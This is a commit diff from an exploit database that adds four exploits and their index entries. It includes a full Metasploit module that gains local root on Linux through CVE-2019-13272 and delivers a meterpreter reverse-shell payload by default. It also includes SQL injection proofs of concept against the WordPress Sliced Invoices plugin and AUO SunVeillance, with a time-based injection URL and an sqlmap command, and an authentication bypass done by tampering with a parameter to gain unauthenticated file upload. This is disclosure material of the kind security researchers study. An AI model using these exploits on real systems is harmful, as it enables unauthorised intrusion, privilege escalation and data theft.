DB: 2019-10-25
4 changes to exploits/shellcodes Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit) Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
This commit is contained in:
parent
afafb6c641
commit
52e6461f47
5 changed files with 209 additions and 0 deletions
23
exploits/hardware/webapps/47541.txt
Normal file
23
exploits/hardware/webapps/47541.txt
Normal file
|
@ -0,0 +1,23 @@
|
|||
# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
|
||||
# Date: 2019-10-24
|
||||
# Exploit Author: Luca.Chiou
|
||||
# Vendor Homepage: https://www.auo.com/zh-TW
|
||||
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
|
||||
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
|
||||
# CVE: N/A
|
||||
|
||||
# 1. Description:
|
||||
# An issue was discovered in AUO SunVeillance Monitoring System.
|
||||
# There is an incorrect access control vulnerability that can allow the attacker to
|
||||
# bypass the authentication mechanism, and upload files to the server without any authentication.
|
||||
|
||||
# 2. Proof of Concept:
|
||||
(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without
|
||||
any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx.
|
||||
(2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled.
|
||||
(3) Now you can upload a file successfully.
|
||||
(4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side.
|
||||
|
||||
Thank you for your kind assistance.
|
||||
|
||||
Luca
|
31
exploits/hardware/webapps/47542.txt
Normal file
31
exploits/hardware/webapps/47542.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
|
||||
# Date: 2019-10-24
|
||||
# Exploit Author: Luca.Chiou
|
||||
# Vendor Homepage: https://www.auo.com/zh-TW
|
||||
# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
|
||||
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
|
||||
# CVE: N/A
|
||||
|
||||
# 1. Description:
|
||||
# AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection.
|
||||
# The vulnerability can allow the attacker inject maliciously SQL command to the server which allows
|
||||
# the attacker to read privileged data.
|
||||
|
||||
# 2. Proof of Concept:
|
||||
|
||||
(1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication.
|
||||
There is a parameter, MailAdd, in mvc_send_mail.aspx.
|
||||
(2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information.
|
||||
(3) By using sqlmap tools, attacker can acquire the database list which in server side.
|
||||
|
||||
cmd: sqlmap.py -u “https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs
|
||||
|
||||
(4) Furthermore, there are a few SQL Injection vulnerabilities in other fields.
|
||||
|
||||
picture_manage_mvc.aspx (parameter: plant_no)
|
||||
swapdl_mvc.aspx (parameter: plant_no)
|
||||
account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code)
|
||||
|
||||
Thank you for your kind assistance.
|
||||
|
||||
Luca
|
132
exploits/linux/local/47543.rb
Executable file
132
exploits/linux/local/47543.rb
Executable file
|
@ -0,0 +1,132 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Post::Linux::Kernel
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Post::Linux::Compile
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
|
||||
'Description' => %q{
|
||||
This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
|
||||
kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
|
||||
not over an SSH session, as it requires execution from within the context of
|
||||
a user with an active Polkit agent.
|
||||
In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
|
||||
the recording of the credentials of a process that wants to create a ptrace
|
||||
relationship, which allows local users to obtain root access by leveraging
|
||||
certain scenarios with a parent-child process relationship, where a parent drops
|
||||
privileges and calls execve (potentially allowing control by an attacker). One
|
||||
contributing factor is an object lifetime issue (which can also cause a panic).
|
||||
Another contributing factor is incorrect marking of a ptrace relationship as
|
||||
privileged, which is exploitable through (for example) Polkit's pkexec helper
|
||||
with PTRACE_TRACEME.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Jann Horn', # Discovery and exploit
|
||||
'bcoles', # Metasploit module
|
||||
'timwr', # Metasploit module
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2019-13272'],
|
||||
['EDB', '47133'],
|
||||
['PACKETSTORM', '153663'],
|
||||
['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
|
||||
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
|
||||
],
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => [ ARCH_X64 ],
|
||||
'Targets' => [[ 'Auto', {} ]],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
|
||||
'PrependFork' => true,
|
||||
},
|
||||
'DisclosureDate' => 'Jul 4 2019'))
|
||||
register_advanced_options [
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false]),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
]
|
||||
end
|
||||
|
||||
def check
|
||||
# Introduced in 4.10, but also backported
|
||||
# Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
|
||||
release = kernel_release
|
||||
v = Gem::Version.new release.split('-').first
|
||||
|
||||
if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
|
||||
vprint_error "Kernel version #{release} is not vulnerable"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "Kernel version #{release} appears to be vulnerable"
|
||||
|
||||
unless command_exists? 'pkexec'
|
||||
vprint_error 'pkexec is not installed'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good 'pkexec is installed'
|
||||
|
||||
arch = kernel_hardware
|
||||
unless arch.include? 'x86_64'
|
||||
vprint_error "System architecture #{arch} is not supported"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "System architecture #{arch} is supported"
|
||||
|
||||
loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
|
||||
if loginctl_output =~ /Remote=yes/
|
||||
print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
|
||||
return CheckCode::Safe
|
||||
end
|
||||
|
||||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_root? && !datastore['ForceExploit']
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
|
||||
end
|
||||
|
||||
unless check == CheckCode::Appears
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
unless writable? datastore['WritableDir']
|
||||
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
|
||||
end
|
||||
|
||||
payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
|
||||
upload_and_chmodx(payload_file, generate_payload_exe)
|
||||
register_file_for_cleanup(payload_file)
|
||||
|
||||
exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
|
||||
if live_compile?
|
||||
vprint_status 'Live compiling exploit on system...'
|
||||
upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
|
||||
else
|
||||
vprint_status 'Dropping pre-compiled exploit on system...'
|
||||
upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
|
||||
end
|
||||
register_file_for_cleanup(exploit_file)
|
||||
|
||||
print_status("Executing exploit '#{exploit_file}'")
|
||||
result = cmd_exec("echo #{payload_file} | #{exploit_file}")
|
||||
print_status("Exploit result:\n#{result}")
|
||||
end
|
||||
end
|
19
exploits/php/webapps/47540.txt
Normal file
19
exploits/php/webapps/47540.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection
|
||||
# Date: 2019-10-22
|
||||
# Exploit Author: Lucian Ioan Nitescu
|
||||
# Contact: https://twitter.com/LucianNitescu
|
||||
# Webiste: https://nitesculucian.github.io
|
||||
# Vendor Homepage: https://slicedinvoices.com/
|
||||
# Software Link: https://wordpress.org/plugins/sliced-invoices/
|
||||
# Version: 3.8.2
|
||||
# Tested on: Ubuntu 18.04 / Wordpress 5.3
|
||||
|
||||
# 1. Description:
|
||||
# Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected
|
||||
# by an Authenticated SQL Injection vulnerability.
|
||||
|
||||
# 2. Proof of Concept:
|
||||
# Authenticated SQL Injection:
|
||||
- Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
|
||||
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
|
||||
- Sqlmap can be used to further exploit the vulnerability.
|
|
@ -10732,6 +10732,7 @@ id,file,description,date,author,type,platform,port
|
|||
47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
|
||||
47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
|
||||
47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
|
||||
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -41858,3 +41859,6 @@ id,file,description,date,author,type,platform,port
|
|||
47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php,
|
||||
47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux,
|
||||
47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php,
|
||||
47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
|
||||
47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
|
||||
47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue